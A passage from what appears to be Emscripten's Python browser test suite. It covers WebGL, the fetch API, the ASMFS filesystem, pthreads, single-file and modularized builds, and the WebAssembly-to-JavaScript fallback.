['-s', 'MAX_WEBGL_VERSION=2', '-DTEST_WEBGL2=1', '-DTEST_ANTIALIAS=0'],
]:
cmd = args + ['-lGL', '-s', 'OFFSCREEN_FRAMEBUFFER', '-DEXPLICIT_SWAP=1']
self.btest('webgl_offscreen_framebuffer_swap_with_bad_state.c', '0', args=cmd)
# Tests that -s WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG=1 rendering works.
@requires_graphics_hardware
def test_webgl_workaround_webgl_uniform_upload_bug(self):
self.btest('webgl_draw_triangle_with_uniform_color.c', '0', args=['-lGL', '-s', 'WORKAROUND_OLD_WEBGL_UNIFORM_UPLOAD_IGNORED_OFFSET_BUG'])
# Tests that using an array of structs in GL uniforms works.
@requires_graphics_hardware
def test_webgl_array_of_structs_uniform(self):
self.btest('webgl_array_of_structs_uniform.c', args=['-lGL', '-s', 'MAX_WEBGL_VERSION=2'], reference='webgl_array_of_structs_uniform.png')
# Tests that if a WebGL context is created in a pthread on a canvas that has not been transferred to that pthread, WebGL calls are then proxied to the main thread
# -DTEST_OFFSCREEN_CANVAS=1: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via using Emscripten's EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES="#canvas", then OffscreenCanvas is used
# -DTEST_OFFSCREEN_CANVAS=2: Tests that if a WebGL context is created on a pthread that has the canvas transferred to it via automatic transferring of Module.canvas when EMSCRIPTEN_PTHREAD_TRANSFERRED_CANVASES is not defined, then OffscreenCanvas is also used
@requires_threads
@requires_offscreen_canvas
def test_webgl_offscreen_canvas_in_proxied_pthread(self):
for asyncify in [0, 1]:
cmd = ['-s', 'USE_PTHREADS', '-s', 'OFFSCREENCANVAS_SUPPORT', '-lGL', '-s', 'GL_DEBUG', '-s', 'PROXY_TO_PTHREAD']
if asyncify:
# given the synchronous render loop here, asyncify is needed to see intermediate frames and
# the gradual color change
cmd += ['-s', 'ASYNCIFY', '-DASYNCIFY']
print(str(cmd))
self.btest('gl_in_proxy_pthread.cpp', expected='1', args=cmd)
@requires_threads
@requires_graphics_hardware
@requires_offscreen_canvas
def test_webgl_resize_offscreencanvas_from_main_thread(self):
for args1 in [[], ['-s', 'PROXY_TO_PTHREAD']]:
for args2 in [[], ['-DTEST_SYNC_BLOCKING_LOOP=1']]:
for args3 in [[], ['-s', 'OFFSCREENCANVAS_SUPPORT', '-s', 'OFFSCREEN_FRAMEBUFFER']]:
cmd = args1 + args2 + args3 + ['-s', 'USE_PTHREADS', '-lGL', '-s', 'GL_DEBUG']
print(str(cmd))
self.btest('resize_offscreencanvas_from_main_thread.cpp', expected='1', args=cmd)
@requires_graphics_hardware
def test_webgl_simple_enable_extensions(self):
for webgl_version in [1, 2]:
for simple_enable_extensions in [0, 1]:
cmd = ['-DWEBGL_CONTEXT_VERSION=' + str(webgl_version),
'-DWEBGL_SIMPLE_ENABLE_EXTENSION=' + str(simple_enable_extensions),
'-s', 'MAX_WEBGL_VERSION=2',
'-s', 'GL_SUPPORT_AUTOMATIC_ENABLE_EXTENSIONS=' + str(simple_enable_extensions),
'-s', 'GL_SUPPORT_SIMPLE_ENABLE_EXTENSIONS=' + str(simple_enable_extensions)]
self.btest('webgl2_simple_enable_extensions.c', expected='0', args=cmd)
# Tests the feature that shell html page can preallocate the typed array and place it
# to Module.buffer before loading the script page.
# In this build mode, the -s INITIAL_MEMORY=xxx option will be ignored.
# Preallocating the buffer in this was is asm.js only (wasm needs a Memory).
def test_preallocated_heap(self):
self.btest_exit('test_preallocated_heap.cpp', args=['-s', 'WASM=0', '-s', 'INITIAL_MEMORY=16MB', '-s', 'ABORTING_MALLOC=0', '--shell-file', test_file('test_preallocated_heap_shell.html')])
# Tests emscripten_fetch() usage to XHR data directly to memory without persisting results to IndexedDB.
def test_fetch_to_memory(self):
# Test error reporting in the negative case when the file URL doesn't exist. (http 404)
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
# Test the positive case when the file URL exists. (http 200)
shutil.copyfile(test_file('gears.png'), 'gears.png')
for arg in [[], ['-s', 'FETCH_SUPPORT_INDEXEDDB=0']]:
self.btest('fetch/to_memory.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'] + arg,
also_asmjs=True)
@parameterized({
'': ([],),
'pthread_exit': (['-DDO_PTHREAD_EXIT'],),
})
@requires_threads
def test_fetch_from_thread(self, args):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/from_thread.cpp',
expected='42',
args=args + ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-DFILE_DOES_NOT_EXIST'],
also_asmjs=True)
def test_fetch_to_indexdb(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/to_indexeddb.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests emscripten_fetch() usage to persist an XHR into IndexedDB and subsequently load up from there.
def test_fetch_cached_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/cached_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH'],
also_asmjs=True)
# Tests that response headers get set on emscripten_fetch_t values.
@requires_threads
def test_fetch_response_headers(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/response_headers.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'], also_asmjs=True)
# Test emscripten_fetch() usage to stream a XHR in to memory without storing the full file in memory
def test_fetch_stream_file(self):
self.skipTest('moz-chunked-arraybuffer was firefox-only and has been removed')
# Strategy: create a large 128MB file, and compile with a small 16MB Emscripten heap, so that the tested file
# won't fully fit in the heap. This verifies that streaming works properly.
s = '12345678'
for i in range(14):
s = s[::-1] + s # length of str will be 2^17=128KB
with open('largefile.txt', 'w') as f:
for i in range(1024):
f.write(s)
self.btest('fetch/stream_file.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'INITIAL_MEMORY=536870912'],
also_asmjs=True)
# Tests emscripten_fetch() usage in synchronous mode when used from the main
# thread proxied to a Worker with -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_fetch_sync_xhr(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp', expected='1', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests emscripten_fetch() usage when user passes none of the main 3 flags (append/replace/no_download).
# In that case, in append is implicitly understood.
@requires_threads
def test_fetch_implicit_append(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests synchronous emscripten_fetch() usage from wasm pthread in fastcomp.
@requires_threads
def test_fetch_sync_xhr_in_wasm(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/example_synchronous_fetch.cpp', expected='200', args=['-s', 'FETCH', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Tests that the Fetch API works for synchronous XHRs when used with --proxy-to-worker.
@requires_threads
def test_fetch_sync_xhr_in_proxy_to_worker(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_xhr.cpp',
expected='1',
args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '--proxy-to-worker'],
also_asmjs=True)
# Tests waiting on EMSCRIPTEN_FETCH_WAITABLE request from a worker thread
@no_wasm_backend("emscripten_fetch_wait uses an asm.js based web worker")
@requires_threads
def test_fetch_sync_fetch_in_main_thread(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/sync_fetch_in_main_thread.cpp', expected='0', args=['-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_store(self):
self.btest('fetch/idb_store.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
@no_wasm_backend("WASM2JS does not yet support pthreads")
def test_fetch_idb_delete(self):
shutil.copyfile(test_file('gears.png'), 'gears.png')
self.btest('fetch/idb_delete.cpp', expected='0', args=['-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'FETCH', '-s', 'WASM=0', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_hello_file(self):
# Test basic file loading and the valid character set for files.
ensure_dir('dirrey')
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), os.path.join(self.get_dir(), 'dirrey', 'hello file !#$%&\'()+,-.;=@[]^_`{}~ %%.txt'))
self.btest_exit('asmfs/hello_file.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_read_file_twice(self):
shutil.copyfile(test_file('asmfs', 'hello_file.txt'), 'hello_file.txt')
self.btest_exit('asmfs/read_file_twice.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_fopen_write(self):
self.btest_exit('asmfs/fopen_write.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_mkdir_create_unlink_rmdir(self):
self.btest('cstdio/test_remove.cpp', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir(self):
self.btest('dirent/test_readdir.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_dirent_test_readdir_empty(self):
self.btest('dirent/test_readdir_empty.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_close(self):
self.btest_exit(test_file('unistd', 'close.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_access(self):
self.btest_exit(test_file('unistd', 'access.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_asmfs
@requires_threads
def test_asmfs_unistd_unlink(self):
# TODO: Once symlinks are supported, remove -DNO_SYMLINK=1
self.btest_exit(test_file('unistd', 'unlink.c'), 0, args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-DNO_SYMLINK=1'])
@requires_asmfs
@requires_threads
def test_asmfs_test_fcntl_open(self):
self.btest('fcntl/test_fcntl_open.c', expected='0', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG', '-s', 'PROXY_TO_PTHREAD'])
@requires_asmfs
@requires_threads
def test_asmfs_relative_paths(self):
self.btest_exit('asmfs/relative_paths.cpp', args=['-s', 'ASMFS', '-s', 'WASM=0', '-s', 'USE_PTHREADS', '-s', 'FETCH_DEBUG'])
@requires_threads
def test_pthread_locale(self):
for args in [
[],
['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2'],
]:
print("Testing with: ", args)
self.btest('pthread/test_pthread_locale.c', expected='1', args=args)
# Tests the Emscripten HTML5 API emscripten_set_canvas_element_size() and emscripten_get_canvas_element_size() functionality in singlethreaded programs.
def test_emscripten_set_canvas_element_size(self):
self.btest('emscripten_set_canvas_element_size.c', expected='1')
# Test that emscripten_get_device_pixel_ratio() is callable from pthreads (and proxies to main thread to obtain the proper window.devicePixelRatio value).
@requires_threads
def test_emscripten_get_device_pixel_ratio(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest('emscripten_get_device_pixel_ratio.c', expected='1', args=args)
# Tests that emscripten_run_script() variants of functions work in pthreads.
@requires_threads
def test_pthread_run_script(self):
for args in [[], ['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD']]:
self.btest(test_file('pthread', 'test_pthread_run_script.cpp'), expected='1', args=['-O3'] + args)
# Tests emscripten_set_canvas_element_size() and OffscreenCanvas functionality in different build configurations.
@requires_threads
@requires_graphics_hardware
def test_emscripten_animate_canvas_element_size(self):
for args in [
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_EXPLICIT_CONTEXT_SWAP=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1'],
['-DTEST_EXPLICIT_CONTEXT_SWAP=1', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS', '-s', 'OFFSCREEN_FRAMEBUFFER=1', '-DTEST_MANUALLY_SET_ELEMENT_CSS_SIZE=1'],
['-DTEST_EMSCRIPTEN_SET_MAIN_LOOP=1', '-s', 'OFFSCREENCANVAS_SUPPORT'],
]:
cmd = ['-lGL', '-O3', '-g2', '--shell-file', test_file('canvas_animate_resize_shell.html'), '-s', 'GL_DEBUG', '--threadprofiler'] + args
print(' '.join(cmd))
self.btest('canvas_animate_resize.cpp', expected='1', args=cmd)
# Tests the absolute minimum pthread-enabled application.
@requires_threads
def test_pthread_hello_thread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule', '--shell-file', test_file('shell_that_launches_modularize.html')]]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'USE_PTHREADS'] + modularize + opts)
# Tests that a pthreads build of -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_pthread(self):
for opts in [[], ['-O3']]:
for modularize in [[], ['-s', 'MODULARIZE', '-s', 'EXPORT_NAME=MyModule']]:
self.btest(test_file('pthread', 'hello_thread.c'), expected='1', args=['-s', 'MINIMAL_RUNTIME', '-s', 'USE_PTHREADS'] + modularize + opts)
# Tests memory growth in pthreads mode, but still on the main thread.
@requires_threads
def test_pthread_growth_mainthread(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth_mainthread.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests memory growth in a pthread.
@requires_threads
def test_pthread_growth(self):
self.emcc_args.remove('-Werror')
def run(emcc_args=[]):
self.btest(test_file('pthread', 'test_pthread_memory_growth.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=2', '-s', 'ALLOW_MEMORY_GROWTH', '-s', 'INITIAL_MEMORY=32MB', '-s', 'MAXIMUM_MEMORY=256MB', '-g'] + emcc_args, also_asmjs=False)
run()
run(['-s', 'ASSERTIONS'])
run(['-s', 'PROXY_TO_PTHREAD'])
# Tests that time in a pthread is relative to the main thread, so measurements
# on different threads are still monotonic, as if checking a single central
# clock.
@requires_threads
def test_pthread_reltime(self):
self.btest(test_file('pthread', 'test_pthread_reltime.cpp'), expected='3', args=['-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE'])
# Tests that it is possible to load the main .js file of the application manually via a Blob URL, and still use pthreads.
@requires_threads
def test_load_js_from_blob_with_pthreads(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
self.compile_btest([test_file('pthread', 'hello_thread.c'), '-s', 'USE_PTHREADS', '-o', 'hello_thread_with_blob_url.js'])
shutil.copyfile(test_file('pthread', 'main_js_as_blob_loader.html'), 'hello_thread_with_blob_url.html')
self.run_browser('hello_thread_with_blob_url.html', 'hello from thread!', '/report_result?1')
# Tests that base64 utils work in browser with no native atob function
def test_base64_atob_fallback(self):
create_file('test.c', r'''
#include <stdio.h>
#include <emscripten.h>
int main() {
return 0;
}
''')
# generate a dummy file
create_file('dummy_file', 'dummy')
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest(['test.c', '-s', 'EXIT_RUNTIME', '-s', 'MODULARIZE', '-s', 'EXPORT_NAME="Foo"', '--preload-file', 'dummy_file', '-s', 'SINGLE_FILE'])
create_file('a.html', '''
<script>
atob = undefined;
fetch = undefined;
</script>
<script src="a.out.js"></script>
<script>
var foo = Foo();
</script>
''')
self.run_browser('a.html', '...', '/report_result?exit:0')
# Tests that SINGLE_FILE works as intended in generated HTML (with and without Worker)
def test_single_file_html(self):
self.btest('single_file_static_initializer.cpp', '19', args=['-s', 'SINGLE_FILE'], also_proxied=True)
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.mem')
# Tests that SINGLE_FILE works as intended in generated HTML with MINIMAL_RUNTIME
def test_minimal_runtime_single_file_html(self):
for wasm in [0, 1]:
for opts in [[], ['-O3']]:
self.btest('single_file_static_initializer.cpp', '19', args=opts + ['-s', 'MINIMAL_RUNTIME', '-s', 'SINGLE_FILE', '-s', 'WASM=' + str(wasm)])
self.assertExists('test.html')
self.assertNotExists('test.js')
self.assertNotExists('test.wasm')
self.assertNotExists('test.asm.js')
self.assertNotExists('test.mem')
self.assertNotExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that SINGLE_FILE works when built with ENVIRONMENT=web and Closure enabled (#7933)
def test_single_file_in_web_environment_with_closure(self):
self.btest('minimal_hello.c', '0', args=['-s', 'SINGLE_FILE', '-s', 'ENVIRONMENT=web', '-O2', '--closure=1'])
# Tests that SINGLE_FILE works as intended with locateFile
def test_single_file_locate_file(self):
for wasm_enabled in [True, False]:
args = [test_file('browser_test_hello_world.c'), '-o', 'test.js', '-s', 'SINGLE_FILE']
if not wasm_enabled:
args += ['-s', 'WASM=0']
self.compile_btest(args)
create_file('test.html', '''
<script>
var Module = {
locateFile: function (path) {
if (path.indexOf('data:') === 0) {
throw new Error('Unexpected data URI.');
}
return path;
}
};
</script>
<script src="test.js"></script>
''')
self.run_browser('test.html', None, '/report_result?0')
# Tests that SINGLE_FILE works as intended in a Worker in JS output
def test_single_file_worker_js(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'SINGLE_FILE'])
create_file('test.html', '<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
self.assertExists('test.js')
self.assertNotExists('test.worker.js')
# Tests that pthreads code works as intended in a Worker. That is, a pthreads-using
# program can run either on the main thread (normal tests) or when we start it in
# a Worker in this test (in that case, both the main application thread and the worker threads
# are all inside Web Workers).
@requires_threads
def test_pthreads_started_in_worker(self):
self.compile_btest([test_file('pthread', 'test_pthread_atomics.cpp'), '-o', 'test.js', '-s', 'INITIAL_MEMORY=64MB', '-s', 'USE_PTHREADS', '-s', 'PTHREAD_POOL_SIZE=8'])
create_file('test.html', '''
<script>
new Worker('test.js');
</script>
''')
self.run_browser('test.html', None, '/report_result?0')
def test_access_file_after_heap_resize(self):
create_file('test.txt', 'hello from file')
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--preload-file', 'test.txt', '-o', 'page.html'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
# with separate file packager invocation
self.run_process([FILE_PACKAGER, 'data.data', '--preload', 'test.txt', '--js-output=' + 'data.js'])
self.compile_btest([test_file('access_file_after_heap_resize.c'), '-s', 'ALLOW_MEMORY_GROWTH', '--pre-js', 'data.js', '-o', 'page.html', '-s', 'FORCE_FILESYSTEM'])
self.run_browser('page.html', 'hello from file', '/report_result?15')
def test_unicode_html_shell(self):
create_file('main.cpp', r'''
int main() {
REPORT_RESULT(0);
return 0;
}
''')
create_file('shell.html', open(path_from_root('src', 'shell.html')).read().replace('Emscripten-Generated Code', 'Emscripten-Generated Emoji 😅'))
self.compile_btest(['main.cpp', '--shell-file', 'shell.html', '-o', 'test.html'])
self.run_browser('test.html', None, '/report_result?0')
# Tests the functionality of the emscripten_thread_sleep() function.
@requires_threads
def test_emscripten_thread_sleep(self):
self.btest(test_file('pthread', 'emscripten_thread_sleep.c'), expected='1', args=['-s', 'USE_PTHREADS', '-s', 'EXTRA_EXPORTED_RUNTIME_METHODS=[print]'])
# Tests that Emscripten-compiled applications can be run from a relative path in browser that is different than the address of the current page
def test_browser_run_from_different_directory(self):
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.html', '-O3'])
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
src = open('test.html').read()
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', src.replace('test.js', 'subdir/test.js'))
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but asynchronous because of `-s MODULARIZE=1`
def test_browser_run_from_different_directory_async(self):
for args, creations in [
(['-s', 'MODULARIZE'], [
'Module();', # documented way for using modularize
'new Module();' # not documented as working, but we support it
]),
]:
print(args)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js', '-O3'] + args)
ensure_dir('subdir')
shutil.move('test.js', os.path.join('subdir', 'test.js'))
shutil.move('test.wasm', os.path.join('subdir', 'test.wasm'))
for creation in creations:
print(creation)
# Make sure JS is loaded from subdirectory
create_file('test-subdir.html', '''
<script src="subdir/test.js"></script>
<script>
%s
</script>
''' % creation)
self.run_browser('test-subdir.html', None, '/report_result?0')
# Similar to `test_browser_run_from_different_directory`, but
# also also we eval the initial code, so currentScript is not present. That prevents us
# from finding the file in a subdir, but here we at least check we do not regress compared to the
# normal case of finding in the current dir.
def test_browser_modularize_no_current_script(self):
# test both modularize (and creating an instance) and modularize-instance
# (which creates by itself)
for path, args, creation in [
([], ['-s', 'MODULARIZE'], 'Module();'),
(['subdir'], ['-s', 'MODULARIZE'], 'Module();'),
]:
print(path, args, creation)
filesystem_path = os.path.join('.', *path)
ensure_dir(filesystem_path)
# compile the code with the modularize feature and the preload-file option enabled
self.compile_btest([test_file('browser_test_hello_world.c'), '-o', 'test.js'] + args)
shutil.move('test.js', os.path.join(filesystem_path, 'test.js'))
shutil.move('test.wasm', os.path.join(filesystem_path, 'test.wasm'))
open(os.path.join(filesystem_path, 'test.html'), 'w').write('''
<script>
setTimeout(function() {
var xhr = new XMLHttpRequest();
xhr.open('GET', 'test.js', false);
xhr.send(null);
eval(xhr.responseText);
%s
}, 1);
</script>
''' % creation)
self.run_browser('/'.join(path + ['test.html']), None, '/report_result?0')
def test_emscripten_request_animation_frame(self):
self.btest(test_file('emscripten_request_animation_frame.c'), '0')
def test_emscripten_request_animation_frame_loop(self):
self.btest(test_file('emscripten_request_animation_frame_loop.c'), '0')
def test_request_animation_frame(self):
self.btest('request_animation_frame.cpp', '0', also_proxied=True)
@requires_threads
def test_emscripten_set_timeout(self):
self.btest(test_file('emscripten_set_timeout.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_emscripten_set_timeout_loop(self):
self.btest(test_file('emscripten_set_timeout_loop.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_emscripten_set_immediate(self):
self.btest(test_file('emscripten_set_immediate.c'), '0')
def test_emscripten_set_immediate_loop(self):
self.btest(test_file('emscripten_set_immediate_loop.c'), '0')
@requires_threads
def test_emscripten_set_interval(self):
self.btest(test_file('emscripten_set_interval.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
# Test emscripten_performance_now() and emscripten_date_now()
@requires_threads
def test_emscripten_performance_now(self):
self.btest(test_file('emscripten_performance_now.c'), '0', args=['-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
@requires_threads
def test_embind_with_pthreads(self):
self.btest('embind_with_pthreads.cpp', '1', args=['--bind', '-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD'])
def test_embind_with_asyncify(self):
self.btest('embind_with_asyncify.cpp', '1', args=['--bind', '-s', 'ASYNCIFY'])
# Test emscripten_console_log(), emscripten_console_warn() and emscripten_console_error()
def test_emscripten_console_log(self):
self.btest(test_file('emscripten_console_log.c'), '0', args=['--pre-js', test_file('emscripten_console_log_pre.js')])
def test_emscripten_throw_number(self):
self.btest(test_file('emscripten_throw_number.c'), '0', args=['--pre-js', test_file('emscripten_throw_number_pre.js')])
def test_emscripten_throw_string(self):
self.btest(test_file('emscripten_throw_string.c'), '0', args=['--pre-js', test_file('emscripten_throw_string_pre.js')])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a minimal console.log() application
def test_closure_in_web_only_target_environment_console_log(self):
self.btest('minimal_hello.c', '0', args=['-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
# Tests that Closure run in combination with -s ENVIRONMENT=web mode works with a small WebGL application
@requires_graphics_hardware
def test_closure_in_web_only_target_environment_webgl(self):
self.btest('webgl_draw_triangle.c', '0', args=['-lGL', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1'])
def test_no_declare_asm_module_exports_asmjs(self):
for minimal_runtime in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'WASM=0'] + minimal_runtime)
def test_no_declare_asm_module_exports_wasm_minimal_runtime(self):
self.btest(test_file('declare_asm_module_exports.cpp'), '1', args=['-s', 'DECLARE_ASM_MODULE_EXPORTS=0', '-s', 'ENVIRONMENT=web', '-O3', '--closure=1', '-s', 'MINIMAL_RUNTIME'])
# Tests that the different code paths in src/shell_minimal_runtime.html all work ok.
def test_minimal_runtime_loader_shell(self):
args = ['-s', 'MINIMAL_RUNTIME=2']
for wasm in [[], ['-s', 'WASM=0', '--memory-init-file', '0'], ['-s', 'WASM=0', '--memory-init-file', '1'], ['-s', 'SINGLE_FILE'], ['-s', 'WASM=0', '-s', 'SINGLE_FILE']]:
for modularize in [[], ['-s', 'MODULARIZE']]:
print(str(args + wasm + modularize))
self.btest('minimal_hello.c', '0', args=args + wasm + modularize)
# Tests that -s MINIMAL_RUNTIME=1 works well in different build modes
def test_minimal_runtime_hello_world(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_COMPILATION', '--closure=1'], ['-s', 'MINIMAL_RUNTIME_STREAMING_WASM_INSTANTIATION', '--closure', '1']]:
self.btest(test_file('small_hello_world.c'), '0', args=args + ['-s', 'MINIMAL_RUNTIME'])
@requires_threads
def test_offset_converter(self, *args):
try:
self.btest_exit(test_file('browser', 'test_offset_converter.c'), assert_returncode=1, args=['-s', 'USE_OFFSET_CONVERTER', '-g4', '-s', 'PROXY_TO_PTHREAD', '-s', 'USE_PTHREADS'])
except Exception as e:
# dump the wasm file; this is meant to help debug #10539 on the bots
print(self.run_process([os.path.join(building.get_binaryen_bin(), 'wasm-opt'), 'test.wasm', '-g', '--print', '-all'], stdout=PIPE).stdout)
raise e
# Tests emscripten_unwind_to_js_event_loop() behavior
def test_emscripten_unwind_to_js_event_loop(self, *args):
self.btest(test_file('browser', 'test_emscripten_unwind_to_js_event_loop.c'), '1', args=['-s', 'NO_EXIT_RUNTIME'])
def test_wasm2js_fallback(self):
for args in [[], ['-s', 'MINIMAL_RUNTIME']]:
self.compile_btest([test_file('small_hello_world.c'), '-s', 'WASM=2', '-o', 'test.html'] + args)
# First run with WebAssembly support enabled
# Move the Wasm2js fallback away to test it is not accidentally getting loaded.
os.rename('test.wasm.js', 'test.wasm.js.unused')
self.run_browser('test.html', 'hello!', '/report_result?0')
os.rename('test.wasm.js.unused', 'test.wasm.js')
# Then disable WebAssembly support in VM, and try again.. Should still work with Wasm2JS fallback.
html = open('test.html', 'r').read()
html = html.replace('<body>', '<body><script>delete WebAssembly;</script>')
open('test.html', 'w').write(html)
os.remove('test.wasm') # Also delete the Wasm file to test that it is not attempted to be loaded.
self.run_browser('test.html', 'hello!', '/report_result?0')
def test_wasm2js_fallback_on_wasm_compilation_failure(self):
